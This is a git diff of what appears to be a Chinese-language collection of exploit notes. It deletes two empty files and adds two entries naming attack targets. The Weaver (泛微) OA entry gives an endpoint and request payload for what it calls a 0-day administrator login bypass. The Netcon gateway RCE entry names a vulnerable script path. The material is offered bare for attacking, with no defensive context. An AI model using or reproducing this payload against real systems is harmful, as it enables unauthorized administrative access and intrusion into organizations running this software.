diff --git "a/cloud\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" "b/cloud\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" deleted file mode 100644 index e69de29..0000000 diff --git "a/\346\263\233\345\276\256OA-0day\347\256\241\347\220\206\345\221\230\344\273\273\346\204\217\347\231\273\345\275\225.md" "b/\346\263\233\345\276\256OA-0day\347\256\241\347\220\206\345\221\230\344\273\273\346\204\217\347\231\273\345\275\225.md" index e69de29..17c0cdf 100644 --- "a/\346\263\233\345\276\256OA-0day\347\256\241\347\220\206\345\221\230\344\273\273\346\204\217\347\231\273\345\275\225.md" +++ "b/\346\263\233\345\276\256OA-0day\347\256\241\347\220\206\345\221\230\344\273\273\346\204\217\347\231\273\345\275\225.md" @@ -0,0 +1,12 @@ +## 泛微OA-0day管理员任意登录 + + +> URL +``` +/mobile/plugin/VerifyQuickLogin.jsp +``` + +> Payload +``` +identifier=1&language=1&ipaddress= +``` diff --git "a/\347\224\250\345\217\213u8cloud\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" "b/\347\224\250\345\217\213u8cloud\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" deleted file mode 100644 index e69de29..0000000 diff --git "a/\347\275\221\345\272\267\347\247\221\346\212\200\347\275\221\345\205\263RCE.md" "b/\347\275\221\345\272\267\347\247\221\346\212\200\347\275\221\345\205\263RCE.md" index e69de29..8c119db 100644 --- "a/\347\275\221\345\272\267\347\247\221\346\212\200\347\275\221\345\205\263RCE.md" +++ "b/\347\275\221\345\272\267\347\247\221\346\212\200\347\275\221\345\205\263RCE.md" @@ -0,0 +1,5 @@ +## 网康科技网关RCE + +``` +/scripts/aitrain.php +```